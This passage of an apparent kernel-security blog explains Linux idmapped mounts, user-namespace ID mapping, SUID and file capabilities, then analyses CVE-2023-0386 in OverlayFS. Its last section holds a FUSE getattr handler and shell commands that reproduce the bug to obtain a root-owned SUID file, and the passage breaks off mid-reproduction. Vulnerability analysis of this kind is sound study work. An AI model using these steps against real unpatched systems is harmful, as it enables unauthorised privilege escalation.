<p>Basically, every file stores its <strong>owner and group information</strong> in its <code class="language-plaintext highlighter-rouge">inode</code> object, namely <code class="language-plaintext highlighter-rouge">inode-&gt;i_uid</code> and <code class="language-plaintext highlighter-rouge">inode-&gt;i_gid</code>. However, due to the namespace mechanism, the same UID or GID value may correspond to different users in different user namespaces. Therefore, these identifiers must be <strong>converted into meaningful values</strong> before being used for permission checks.</p>

<p>This conversion is performed by <code class="language-plaintext highlighter-rouge">i_uid_into_vfsuid()</code> and <code class="language-plaintext highlighter-rouge">i_gid_into_vfsgid()</code>. Corresponding inverse conversion functions, <code class="language-plaintext highlighter-rouge">mapped_fsuid()</code> and <code class="language-plaintext highlighter-rouge">mapped_fsgid()</code>, are also provided.</p>

<p>Here, we only analyze the UID conversion path, as the GID handling follows the same mechanism.</p>

<p>If the idmap (<code class="language-plaintext highlighter-rouge">idmap</code>) points to the dummy one (<code class="language-plaintext highlighter-rouge">&amp;nop_mnt_idmap</code>), the kernel simply <strong>returns <code class="language-plaintext highlighter-rouge">inode-&gt;i_uid</code> as the VFS UID value</strong>. Otherwise, it <strong>looks up the corresponding VFS UID from the idmap (<code class="language-plaintext highlighter-rouge">idmap-&gt;uid_map</code>)</strong> using the UID in the user namespace rather than the init namespace.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>i_uid_into_vfsuid(idmap, inode)
=&gt; make_vfsuid(idmap, i_user_ns(inode), inode-&gt;i_uid)
  =&gt; if (idmap == &amp;nop_mnt_idmap)
    =&gt; return VFSUIDT_INIT(kuid)
  
  =&gt; uid = from_kuid(fs_userns, kuid)
  =&gt; return VFSUIDT_INIT_RAW(map_id_down(&amp;idmap-&gt;uid_map, uid))
</code></pre></div></div>

<p>The idmap is a member of the <code class="language-plaintext highlighter-rouge">vfsmount</code> structure and is used to map user IDs between namespaces.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">vfsmount</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">dentry</span> <span class="o">*</span><span class="n">mnt_root</span><span class="p">;</span>       <span class="cm">/* root of the mounted tree */</span>
    <span class="k">struct</span> <span class="n">super_block</span> <span class="o">*</span><span class="n">mnt_sb</span><span class="p">;</span>    <span class="cm">/* pointer to superblock */</span>
    <span class="kt">int</span> <span class="n">mnt_flags</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">mnt_idmap</span> <span class="o">*</span><span class="n">mnt_idmap</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span>
</code></pre></div></div>

<p>By default, the idmap of a <code class="language-plaintext highlighter-rouge">mount</code> object is set to <code class="language-plaintext highlighter-rouge">&amp;nop_mnt_idmap</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>alloc_vfsmnt(name)
=&gt; mnt = kmem_cache_zalloc(mnt_cache)
=&gt; mnt-&gt;mnt.mnt_idmap = &amp;nop_mnt_idmap
=&gt; return mnt
</code></pre></div></div>

<p>A process can set the idmap of a specific mount point to that of a user namespace using the <strong><code class="language-plaintext highlighter-rouge">mount_setattr</code> syscall</strong> (the <code class="language-plaintext highlighter-rouge">open_tree_attr</code> syscall can also be used).</p>

<p>Internally, <code class="language-plaintext highlighter-rouge">build_mount_idmapped()</code> retrieves the user namespace object from the given <code class="language-plaintext highlighter-rouge">userns_fd</code>, which is a file descriptor obtained by opening file <code class="language-plaintext highlighter-rouge">"/proc/&lt;pid&gt;/ns/user"</code>. After that, the UID (<code class="language-plaintext highlighter-rouge">mnt_userns-&gt;uid_map</code>) and GID (<code class="language-plaintext highlighter-rouge">mnt_userns-&gt;gid_map</code>) mappings of the user namespace are duplicated and assigned to the mount point’s idmap (<code class="language-plaintext highlighter-rouge">mnt-&gt;mnt.mnt_idmap</code>).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_mount_setattr(dfd, path, flags, uattr, usize)
=&gt; wants_mount_setattr(uattr, usize, &amp;kattr)
  =&gt; copy_struct_from_user(&amp;attr, sizeof(attr), uattr, usize)
  =&gt; build_mount_kattr(&amp;attr, usize, kattr)
    =&gt; build_mount_idmapped(attr, usize, kattr)
      =&gt; CLASS(fd, f)(attr-&gt;userns_fd)
      =&gt; ns = get_proc_ns(file_inode(fd_file(f)))
      =&gt; mnt_userns = container_of(ns, struct user_namespace, ns)
      =&gt; kattr-&gt;mnt_userns = get_user_ns(mnt_userns)

=&gt; user_path_at(dfd, path, kattr.lookup_flags, &amp;target)

=&gt; do_mount_setattr(&amp;target, &amp;kattr)
  =&gt; mnt_idmap = alloc_mnt_idmap(kattr-&gt;mnt_userns)
    =&gt; copy_mnt_idmap(&amp;mnt_userns-&gt;uid_map, &amp;idmap-&gt;uid_map)
    =&gt; copy_mnt_idmap(&amp;mnt_userns-&gt;gid_map, &amp;idmap-&gt;gid_map)

  =&gt; kattr-&gt;mnt_idmap = mnt_idmap
  =&gt; mount_setattr_commit(kattr, mnt)
    =&gt; do_idmap_mount(kattr, m)
      =&gt; smp_store_release(&amp;mnt-&gt;mnt.mnt_idmap, mnt_idmap_get(kattr-&gt;mnt_idmap))
</code></pre></div></div>

<p>At this point, we know that a mount idmap is essentially derived from <strong>the idmap of a user namespace</strong>. In the next section, we will explain how to create an idmap and how the mapping works.</p>

<h3 id="22-uid--gid-mappings">2.2. UID &amp; GID mappings</h3>

<p>The user and group identifiers of a process are stored in <code class="language-plaintext highlighter-rouge">current-&gt;cred</code>, which is a <code class="language-plaintext highlighter-rouge">cred</code> object.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">cred</span> <span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">kuid_t</span> <span class="n">uid</span><span class="p">;</span>   <span class="cm">/* real UID of the task */</span>
    <span class="n">kgid_t</span> <span class="n">gid</span><span class="p">;</span>   <span class="cm">/* real GID of the task */</span>
    <span class="n">kuid_t</span> <span class="n">suid</span><span class="p">;</span>  <span class="cm">/* saved UID of the task */</span>
    <span class="n">kgid_t</span> <span class="n">sgid</span><span class="p">;</span>  <span class="cm">/* saved GID of the task */</span>
    <span class="n">kuid_t</span> <span class="n">euid</span><span class="p">;</span>  <span class="cm">/* effective UID of the task */</span>
    <span class="n">kgid_t</span> <span class="n">egid</span><span class="p">;</span>  <span class="cm">/* effective GID of the task */</span>
    <span class="n">kuid_t</span> <span class="n">fsuid</span><span class="p">;</span> <span class="cm">/* UID for VFS ops */</span>
    <span class="n">kgid_t</span> <span class="n">fsgid</span><span class="p">;</span> <span class="cm">/* GID for VFS ops */</span>
    <span class="c1">// [...]</span>
<span class="p">};</span>
</code></pre></div></div>

<p>When it comes to user namespace, how does the kernel save the real UID and GID of a process?</p>

<p>Well, if we examine the implmentation of <code class="language-plaintext highlighter-rouge">unshare_userns()</code>, we can see that it simply duplicates the current <code class="language-plaintext highlighter-rouge">cred</code> object, configure a new user namespace object (<code class="language-plaintext highlighter-rouge">ns</code>), and finally associates the <code class="language-plaintext highlighter-rouge">cred</code> with that namespace, <strong>without modifying the UID or GID information</strong>!</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unshare_userns(unshared_flags, new_cred)
=&gt; cred = prepare_creds()
=&gt; create_user_ns(cred)
  =&gt; ns = kmem_cache_zalloc(user_ns_cachep)
  =&gt; set_cred_user_ns(new, ns)
=&gt; *new_cred = cred
</code></pre></div></div>

<p>This implies that the <code class="language-plaintext highlighter-rouge">cred</code> structure always preserves the real UID and GID. So, there must be another place that stores the UID and GID mapping information for each user namespace.</p>

<p><br /></p>

<p>We can identify where the mapping information is stored by examining the behavior of the <code class="language-plaintext highlighter-rouge">getuid</code> system call.</p>

<p>When <code class="language-plaintext highlighter-rouge">getuid()</code> is invoked immediately after unsharing into a new user namespace, the returned value may be <code class="language-plaintext highlighter-rouge">65534</code> (the <code class="language-plaintext highlighter-rouge">"nobody"</code> user). This happens when the UID <strong>cannot be mapped through the namespace’s UID mapping</strong> (<code class="language-plaintext highlighter-rouge">targ-&gt;uid_map</code>) during the lookup performed by <code class="language-plaintext highlighter-rouge">map_id_range_up()</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_getuid()
=&gt; from_kuid_munged(current_user_ns(), current_uid())
  =&gt; uid = from_kuid(to, kuid)
    =&gt; map_id_up(&amp;targ-&gt;uid_map, __kuid_val(kuid))
      =&gt; map_id_range_up(map, id, 1)
        =&gt; extent = map_id_range_up_base(extents, map, id, count)
        =&gt; if (!extent)
          =&gt; id = -1
  
  =&gt; if (uid == -1)
    =&gt; uid = overflowuid // 65534
</code></pre></div></div>

<p>Obviously, a user namespace maintains its own UID mapping (<code class="language-plaintext highlighter-rouge">targ-&gt;uid_map</code>), and this mapping is used to convert UIDs or GIDs within that user namespace into real UIDs (KUIDs) or GIDs (KGIDs), and vice versa.</p>

<p>Here comes another question: what data does the mapping actually store, and how does a process configure the mapping?</p>

<p>The file <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/uid_map</code> allows user to insert new mapping entries into <code class="language-plaintext highlighter-rouge">ns-&gt;uid_map</code>. Each entry follows the format <code class="language-plaintext highlighter-rouge">&lt;first&gt; &lt;lower_first&gt; &lt;count&gt;</code>, where <code class="language-plaintext highlighter-rouge">&lt;first&gt;</code> represents the <strong>first mapped UID in the current user namespace</strong>, <code class="language-plaintext highlighter-rouge">&lt;lower_first&gt;</code> represents the <strong>corresponding UID in the parent namespace</strong>, and <code class="language-plaintext highlighter-rouge">&lt;count&gt;</code> specifies the <strong>size of the mapping range</strong>.</p>

<p>For example, the entry <code class="language-plaintext highlighter-rouge">"0 1000 1"</code> means that UID <code class="language-plaintext highlighter-rouge">1000</code> in the parent user namespace is mapped to UID <code class="language-plaintext highlighter-rouge">0</code> in the current user namespace.</p>

<p>When writing mapping entries to <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/uid_map</code>, <code class="language-plaintext highlighter-rouge">proc_uid_map_write()</code> is triggered. It parses the input data and converts it into internal structures. Finally, the new mapping (<code class="language-plaintext highlighter-rouge">new_map.extent</code>) is copied to <code class="language-plaintext highlighter-rouge">ns-&gt;uid_map</code>, completing the idmap setup.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proc_uid_map_write(file, buf, size, ppos)
=&gt; map_write(file, buf, size, ppos, CAP_SETUID, &amp;ns-&gt;uid_map, &amp;ns-&gt;parent-&gt;uid_map)
  =&gt; extent.first = simple_strtoul(pos, &amp;pos, 10)
  =&gt; extent.lower_first = simple_strtoul(pos, &amp;pos, 10)
  =&gt; extent.count = simple_strtoul(pos, &amp;pos, 10)
  =&gt; insert_extent(&amp;new_map, &amp;extent)
    =&gt; dest = &amp;map-&gt;extent[map-&gt;nr_extents]
    =&gt; *dest = *extent
  
  =&gt; new_idmap_permitted(file, map_ns, cap_setid, &amp;new_map)

  =&gt; memcpy(map-&gt;extent, new_map.extent, new_map.nr_extents * sizeof(new_map.extent[0]))
  =&gt; map-&gt;nr_extents = new_map.nr_extents
</code></pre></div></div>

<p>At first glance, this mechanism may appear fragile since the user can manipulate the mapping. In practice, however, <code class="language-plaintext highlighter-rouge">new_idmap_permitted()</code> strictly validates all entries, including capability check and whether the requested UID range is permitted.</p>

<p><br /></p>

<p>To summarize the idmap mechanism, let’s go back to <code class="language-plaintext highlighter-rouge">make_vfsuid()</code>, which we mentioned in the last section. It is used to map a KUID (the UID stored in the <code class="language-plaintext highlighter-rouge">inode</code> object) to a UID in the corresponding user namespace.</p>

<p>The inverse function is <code class="language-plaintext highlighter-rouge">from_vfsuid()</code>. It is used to map a UID in the user namespace back to the real UID (the UID in initial user namespace).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  +----------------+        +----------------+
  | inode-&gt;i_uid   |        | target user ns |
  | (init user ns) |        |                |
  |                |        |                |
  |       1000     |        |        0       |
  +--------+-------+        +--------+-------+
           |                         |
           | make_vfsuid()           | from_vfsuid()           path
           v                         v                           |
        +------------- idmap ------------+                       | (mnt)
        |    ns_uid  host_uid  range     |                       v
        |       0      1000      1       |   &lt;-------------  vfsmount
        |  (first) (lower_first) (count) |     (mnt_idmap)
        +--------------------------------+
           |                         |
           v                         v
           0                        1000
</code></pre></div></div>

<h3 id="23-suid">2.3. SUID</h3>

<p>Some of the kernel mechanisms can grant files special permissions; one of the most common is the SUID bit.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">chmod </span>u+s ./file
</code></pre></div></div>

<p>In fact, both the SUID and SGID bits are <strong>stored in <code class="language-plaintext highlighter-rouge">inode-&gt;i_mode</code></strong> as bit flags: <code class="language-plaintext highlighter-rouge">S_ISUID</code> (<code class="language-plaintext highlighter-rouge">0004000</code>) and <code class="language-plaintext highlighter-rouge">S_ISGID</code> (<code class="language-plaintext highlighter-rouge">0002000</code>).</p>

<p>Internally, the <code class="language-plaintext highlighter-rouge">chmod</code> syscall invokes the <code class="language-plaintext highlighter-rouge">.setattr</code> handler of the inode (<code class="language-plaintext highlighter-rouge">inode-&gt;i_op-&gt;setattr</code>) and updates the <code class="language-plaintext highlighter-rouge">inode-&gt;i_mode</code> with the new mode value.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_chmod
=&gt; do_fchmodat()
  =&gt; do_fchmodat(AT_FDCWD, filename, mode, 0)
    =&gt; user_path_at(dfd, filename, lookup_flags, &amp;path)
      =&gt; chmod_common(&amp;path, mode)
        =&gt; notify_change(mnt_idmap(path-&gt;mnt), path-&gt;dentry, &amp;newattrs, &amp;delegated_inode)
          =&gt; may_setattr(idmap, inode, ia_valid)
            =&gt; inode-&gt;i_op-&gt;setattr(idmap, dentry, attr)
              =&gt; ...
              =&gt; mode = attr-&gt;ia_mode
              =&gt; inode-&gt;i_mode = mode
</code></pre></div></div>

<p>These two bits are retrieved when an executable is run. The <code class="language-plaintext highlighter-rouge">execve</code> syscall invokes <code class="language-plaintext highlighter-rouge">bprm_creds_from_file()</code> to handle the <strong>process credentials</strong>. It then calls <code class="language-plaintext highlighter-rouge">bprm_fill_uid()</code> to check the file’s SUID bit. If the kernel detects that the SUID bit is set, it retrieves <code class="language-plaintext highlighter-rouge">inode-&gt;i_uid</code>, map it to a KUID, and finally <strong>assigns it to the <code class="language-plaintext highlighter-rouge">cred</code> object (<code class="language-plaintext highlighter-rouge">bprm-&gt;cred-&gt;euid</code>)</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bprm_creds_from_file(brpm)
=&gt; file = bprm-&gt;execfd_creds ? bprm-&gt;executable : bprm-&gt;file

=&gt; bprm_fill_uid(bprm, file)
  =&gt; inode = file_inode(file)
  =&gt; ...
   =&gt; vfsuid = i_uid_into_vfsuid(idmap, inode)
  =&gt; bprm-&gt;cred-&gt;euid = vfsuid_into_kuid(vfsuid)

=&gt; security_bprm_creds_from_file(bprm, file)
</code></pre></div></div>

<h3 id="24-capability">2.4. Capability</h3>

<p>The capability is also one of the mechanisms that allows a user to grant higher privileges.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>setcap cap_setuid+ep ./test
</code></pre></div></div>

<p>These capabilities are actually stored as <strong>extended attributes (EAs)</strong>. When the kernel detects that the EA name is <strong><code class="language-plaintext highlighter-rouge">"security.capability"</code></strong>, it first calls <code class="language-plaintext highlighter-rouge">cap_convert_nscap()</code> to verify whether the process has sufficient privileges to set capabilities on the file. It then invokes the filesystem’s set handler (<code class="language-plaintext highlighter-rouge">handler-&gt;set</code>) to <strong>persistently store the EA</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_setxattr(dfd, pathname, at_flags, name, uargs, usize)
=&gt; path_setxattrat(AT_FDCWD, pathname, 0, name, value, size, flags)
  =&gt; setxattr_copy(name, &amp;ctx)
    =&gt; import_xattr_name(ctx-&gt;kname, name)
    =&gt; ctx-&gt;kvalue = vmemdup_user(ctx-&gt;cvalue, ctx-&gt;size)

  =&gt; filename_setxattr(dfd, filename, lookup_flags, &amp;ctx)
    =&gt; filename_lookup(dfd, filename, lookup_flags, &amp;path, NULL)
    =&gt; do_setxattr(file_mnt_idmap(f), f-&gt;f_path.dentry, ctx)
      =&gt; vfs_setxattr(idmap, dentry, ctx-&gt;kname-&gt;name, ctx-&gt;kvalue, ctx-&gt;size, ctx-&gt;flags)
        
        =&gt; if name == "security.capability"
          =&gt; cap_convert_nscap(idmap, dentry, &amp;value, size)
        
        =&gt; __vfs_setxattr_locked(idmap, dentry, name, value, size, flags, &amp;delegated_inode)
          =&gt; __vfs_setxattr_noperm(idmap, dentry, name, value, size, flags)
            =&gt; __vfs_setxattr(idmap, dentry, inode, name, value, size, flags)
              =&gt; handler = xattr_resolve_name(inode, &amp;name)
              =&gt; handler-&gt;set(handler, idmap, dentry, inode, name, value, size, flags)
</code></pre></div></div>

<p>Like the SUID bit, capabilities are also handled during the <code class="language-plaintext highlighter-rouge">execve</code> syscall.</p>

<p>Within <code class="language-plaintext highlighter-rouge">bprm_creds_from_file()</code>, <code class="language-plaintext highlighter-rouge">security_bprm_creds_from_file()</code> is called to handle the capability-related logic. It gets the EA named <code class="language-plaintext highlighter-rouge">"security.capability"</code> (<code class="language-plaintext highlighter-rouge">XATTR_NAME_CAPS</code>) from the executable file and <strong>updates the permitted capability set of the <code class="language-plaintext highlighter-rouge">cred</code> object</strong> (<code class="language-plaintext highlighter-rouge">new-&gt;cap_permitted</code>) based on the EA value.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bprm_creds_from_file(brpm)
=&gt; file = bprm-&gt;execfd_creds ? bprm-&gt;executable : bprm-&gt;file
=&gt; bprm_fill_uid(bprm, file)

=&gt; security_bprm_creds_from_file(bprm, file)
  =&gt; cap_bprm_creds_from_file(bprm, file)
    =&gt; get_file_caps(bprm, file, &amp;effective, &amp;has_fcap)
      =&gt; get_vfs_caps_from_disk(file_mnt_idmap(file), file-&gt;f_path.dentry, &amp;vcaps)
        =&gt; __vfs_getxattr((struct dentry *)dentry, inode, XATTR_NAME_CAPS, &amp;data, XATTR_CAPS_SZ)
        =&gt; ... set vcaps
    
      =&gt; bprm_caps_from_vfs_caps(&amp;vcaps, bprm, effective, has_fcap)
        =&gt; new = bprm-&gt;cred
        =&gt; ... set new-&gt;cap_permitted.val
</code></pre></div></div>

<h2 id="3-security-issues">3. Security Issues</h2>

<h3 id="cve-2023-0386-ovl-fail-on-invalid-uidgid-mapping-at-copy-up">CVE-2023-0386: ovl: fail on invalid uid/gid mapping at copy up</h3>
<blockquote>
  <p>https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4f11ada10d0ad3fd53e2bd67806351de63a4f9c3</p>
</blockquote>

<p>I think this is one of the most famous and impactful logical bugs that has occured in filesystems in recent years.</p>

<p>This vulnerability occurs in the kernel function <code class="language-plaintext highlighter-rouge">ovl_copy_up_one()</code>, which is used by OverlayFS to <strong>copy a file from a lower directory to an upper directory</strong>.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -1011,6 +1011,10 @@</span> static int ovl_copy_up_one(struct dentry *parent, struct dentry *dentry,
    if (err)
       return err;
 
<span class="gi">+   if (!kuid_has_mapping(current_user_ns(), ctx.stat.uid) ||
+       !kgid_has_mapping(current_user_ns(), ctx.stat.gid))
+      return -EOVERFLOW;
+
</span></code></pre></div></div>

<p>OverlayFS can be viewed as one of the core mechanisms of <strong>Docker containers</strong>, so the <a href="https://docs.docker.com/engine/storage/drivers/overlayfs-driver/">Docker documentation</a> elaborates on it in much more detail. Here, I only cover some core concepts and analyze the functions related to the vulnerability.</p>

<p><br /></p>

<p>An OverlayFS instance consists of multiple lower directories, an upper directory and a merged directory.</p>

<p>Basically, these <strong>lower directories</strong> contain files that are shared by all containers (or instances) and <strong>cannot be modified (read-only)</strong>. The <strong>merged directory</strong> is a flattened view of all lower directories. If there are conflicting files between lower directories, the one with the highest layer takes precedence.</p>

<p>If a user tries to create new files or modify existing ones, OverlayFS will duplicate target files or create new files if they do not exist in the <strong>upper directory</strong>, which is a writeable directory. The upper directory stores the unique files for each containers and has higher priority than all lower directories.</p>

<p>The <code class="language-plaintext highlighter-rouge">ovl_copy_up_one()</code> function is used to handle the file copy <strong>from the lower directory to the upper directory</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ovl_open(inode, file)
=&gt; ovl_maybe_copy_up(dentry, file-&gt;f_flags)
  =&gt; ovl_copy_up_flags(dentry, flags)
    =&gt; ovl_copy_up_one(parent, next, flags)
</code></pre></div></div>

<p>It first gets the <code class="language-plaintext highlighter-rouge">path</code> object of the lower directory using <code class="language-plaintext highlighter-rouge">ovl_path_lower()</code> [1]. After that, <code class="language-plaintext highlighter-rouge">vfs_getattr()</code> [2] is called to retrieve the file metadata, including the UID and GID.</p>

<p>Before the patch, the kernel failed to verify whether there was <strong>a mapping between the real UID/GID and the current user namespace</strong> [3].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">ovl_copy_up_one</span><span class="p">(</span><span class="k">struct</span> <span class="n">dentry</span> <span class="o">*</span><span class="n">parent</span><span class="p">,</span> <span class="k">struct</span> <span class="n">dentry</span> <span class="o">*</span><span class="n">dentry</span><span class="p">,</span>
               <span class="kt">int</span> <span class="n">flags</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">struct</span> <span class="n">path</span> <span class="n">parentpath</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="n">ovl_path_lower</span><span class="p">(</span><span class="n">dentry</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ctx</span><span class="p">.</span><span class="n">lowerpath</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">vfs_getattr</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">.</span><span class="n">lowerpath</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ctx</span><span class="p">.</span><span class="n">stat</span><span class="p">,</span> <span class="c1">// [2]</span>
              <span class="n">STATX_BASIC_STATS</span><span class="p">,</span> <span class="n">AT_STATX_SYNC_AS_STAT</span><span class="p">);</span>

    <span class="c1">// if (!kuid_has_mapping(current_user_ns(), ctx.stat.uid) || // [3]</span>
    <span class="c1">//     !kgid_has_mapping(current_user_ns(), ctx.stat.gid))</span>
    <span class="c1">//     return -EOVERFLOW;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Since OverlayFS requires a process to have root privileges in the user namespace, the process must call <code class="language-plaintext highlighter-rouge">unshare</code> before mounting OverlayFS. Within a new user namespace, there is no mapping entry for the real root user, so the real root user is shown as <code class="language-plaintext highlighter-rouge">"nobody"</code> (<code class="language-plaintext highlighter-rouge">65534</code>) in that user namespace.</p>

<p>However, files owned by <code class="language-plaintext highlighter-rouge">"nobody"</code> are still duplicated by <code class="language-plaintext highlighter-rouge">ovl_copy_up_one()</code> with <strong>all file metadata preserved</strong>.</p>

<p>We may just pass the directory containing a SUID root executable (like <code class="language-plaintext highlighter-rouge">su</code> or <code class="language-plaintext highlighter-rouge">passwd</code>) as the lower directory and hijack its file content after copy. However, the write handler internally calls <code class="language-plaintext highlighter-rouge">file_remove_privs()</code> to <strong>remove the SUID bit</strong> and <strong>update capabilities of the file</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ovl_write_iter(iocb, iter)
=&gt; realfile = ovl_real_file(file)
=&gt; backing_file_write_iter(realfile, iter, iocb, ifl, &amp;ctx)
  =&gt; ret = file_remove_privs(iocb-&gt;ki_filp)
    =&gt; file_remove_privs_flags(file, 0)
</code></pre></div></div>

<p>So how can we create a file initial namespace whose content is controlled, owned by root, and has the SUID bit set? That’s where the <strong>FUSE filesystem</strong> comes in!</p>

<p>If we use FUSE as one of our lower directories, the filesystem implementation allows us to fully control the file <code class="language-plaintext highlighter-rouge">stat</code> return value, including <code class="language-plaintext highlighter-rouge">ctx.stat.uid</code> and <code class="language-plaintext highlighter-rouge">ctx.stat.gid</code>. We can also set the SUID bit for that file.</p>

<p>To archieve this, we define the <code class="language-plaintext highlighter-rouge">.getattr</code> handler as the <code class="language-plaintext highlighter-rouge">my_getattr()</code> function shown below in FUSE daemon.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">my_getattr</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">stbuf</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">stbuf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s">"/"</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_mode</span> <span class="o">=</span> <span class="n">S_IFDIR</span> <span class="o">|</span> <span class="mo">0755</span><span class="p">;</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_nlink</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">file_path</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_mode</span> <span class="o">=</span> <span class="n">S_IFREG</span> <span class="o">|</span> <span class="mo">04777</span><span class="p">;</span> <span class="c1">// 04000 == SUID</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_nlink</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_size</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">file_content</span><span class="p">);</span>

        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_uid</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// root</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_gid</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// root</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After opening the target file (<code class="language-plaintext highlighter-rouge">file_path</code>), <code class="language-plaintext highlighter-rouge">ovl_copy_up_one()</code> copies it from the lower directory (FUSE) to the upper directory (ext4) while preserving the SUID bit. We can then go back to initial user namespace and executable the SUID binary to get the root shell!</p>

<p>In fact, the reason you are allowed to mount the FUSE filesystem in the <strong>initial user namespace</strong> is that after installing the <code class="language-plaintext highlighter-rouge">libfuse-dev</code> package, the executable <code class="language-plaintext highlighter-rouge">fusermount3</code> is also installed, and it <strong>has the SUID bit</strong>! As a result, even a normal user without the <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> capability can still mount a FUSE filesystem.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">-rwsr-xr-x</span> 1 root root 39376 Sep 21  2024 /usr/bin/fusermount3
</code></pre></div></div>

<p>However, it also appears that this vulnerability <strong>depends on external pacakges</strong> and cannot be exploited by default. That may be why it is not as broadly applicable as DirtyPipe or DirtyCOW.</p>

<p><br /></p>

<p>You can use the following command lines to reproduce this vulnerability yourself.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> <span class="nt">-p</span> overlay-test/<span class="o">{</span>lower,upper,work,merged<span class="o">}</span>
./your_fuse overlay-test/lower <span class="c"># write your fuse program with the getattr handler above</span>

unshare <span class="nt">-r</span> <span class="nt">-n</span> <span class="nt">-m</span> /bin/bash
mount <span class="nt">-t</span> overlay overlay <span class="nt">-o</span> <span class="nv">lowerdir</span><span class="o">=</span>overlay-test/lower,upperdir<span class="o">=</span>overlay-test/upper,workdir<span class="o">=</span>overlay-test/work overlay-test/merged

<span class="nb">exec </span>3&gt;&gt; overlay-test/merged/aaa <span class="c"># aaa == file_path</span>
<span class="nb">ls</span> <span class="nt">-al</span> overlay-test/upper/

<span class="c"># [output]</span>
<span class="c"># ...</span>
<span class="c"># -rwsrwxrwx 1 nobody nogroup   33 Jan  1  1970 aaa</span>
